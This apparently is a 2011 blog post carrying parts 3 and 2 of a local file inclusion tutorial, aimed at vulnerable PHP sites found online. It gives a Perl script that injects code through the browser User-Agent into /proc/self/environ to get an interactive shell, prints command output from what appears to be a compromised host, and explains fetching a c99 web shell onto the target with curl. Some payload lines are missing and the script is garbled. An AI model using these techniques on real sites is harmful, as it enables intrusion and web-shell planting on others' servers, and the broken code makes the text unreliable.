Thursday, September 29, 2011

Local File Inclusion Tutorial Part 3 of 4

LFI Technique

When a request to a php page is made, apache forks (creating a new proccess) and exec' the php binary to actually run/interpret the php script. As in every *nix system each process that runs, has it's own /proc entry, it can be quite useful to us, since it holds a lot information about the process and the enviroment where it is running.

More specifically, the file /proc/self/environ of a php process running has something like this:
(X11; U; Linux i686; en-US; rv: Gecko/20061201 Firefox/ Gentoo�HTTP_KEEP_ALIVE=300�
That "Gentoo" is actually part of the userAgent of my browser. So guess what...
imagine that we change the userAgent of the browser to and make a request like:
you guessed right. it works Smile the php system is actually executed Smile

So, after coding this little perl script
#!/usr/bin/perl -w
use strict;
use LWP 5.64;
use LWP::UserAgent;

my $browser = LWP::UserAgent->new;
my $url = $ARGV[0];
my ($line,$response);
$url .= "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ";

print "jcfsprompt: ";
while( $line = ) {
$browser->agent("jcfs /dev/stdout");?>jcfs");
$response = $browser->get( $url );
if ($response->content =~ /jcfs(.*)jcfs/s) {
print $1;
print "jcfsprompt: ";
I tried something like this...

jcfs@heaven ~/boxes $ perl
jcfsprompt: id
uid=32004(fastfr00) gid=32005(fastfr00) groups=32005(fastfr00) context=system_u:system_r:initrc_t
jcfsprompt: uname -r
jcfsprompt: pwd
jcfsprompt: ls -l
total 2280
-rw-r--r-- 1 fastfr00 fastfr00 17116 Oct 24 2006 401.shtml
-rw-r--r-- 1 fastfr00 fastfr00 16941 Oct 24 2006 403.shtml
-rw-r--r-- 1 fastfr00 fastfr00 17327 Oct 24 2006 404.shtml
-rw-r--r-- 1 fastfr00 fastfr00 17026 Mar 21 17:30 500.shtml
drwxr-xr-x 2 fastfr00 fastfr00 4096 Aug 24 2006 _private
drwxr-xr-x 4 fastfr00 fastfr00 4096 Aug 24 2006 _vti_bin

Thursday, September 8, 2011

Local File Inclusion Tutorial Part 2 of 4

1. site vuln to lfi
2. php knowledge
3. browser Mozilla Firefox...

So... first you find some site vuln to lfi... now we must check if there are logs...
They are usually stored in /proc/self/environ... so just replace /etc/passwd with /proc/self/environ

If you get something like "DOCUMENT_ROOT=..." then it means you sucessfully found logs :D

Now,on that page you can find something like "HTTP_USER_AGENT"...
This value is usually our useragent(mozilla,netscape,etc) and now we must spoof it... but how?

Open a new tab in Mozilla,and type "about:config" (without quotes)...

Now,in "Filter" type: general.useragent.extra.firefox

You will get something like this:

Preference name                            Status     Type        Value
general.useragent.extra.firefox     default     string       Firefox/3.0.7
Now,double click on general.useragent.extra.firefox and replace "Firefox/3.0.7"

If everything is good you will get shell included... Otherwise,you will get errors... Mostly I was getting error "URL-File access disabled" or something like that... but using php I found another way...

Instead of typing
as useragent,type this:
Then load your vuln page like this:
Code: -o c99.php
So,lets review... basicaly,you are just adding &cmd= thing at the end of url...

Now,using "curl" command you will get content of shell in txt format and by using -o c99.php you will rename it to c99.php...

Now simply go to your site like this:
And that's all for now...cheers!
Certified Ethical Hacker Network Security Internet Security Computer Security Wireless Network Security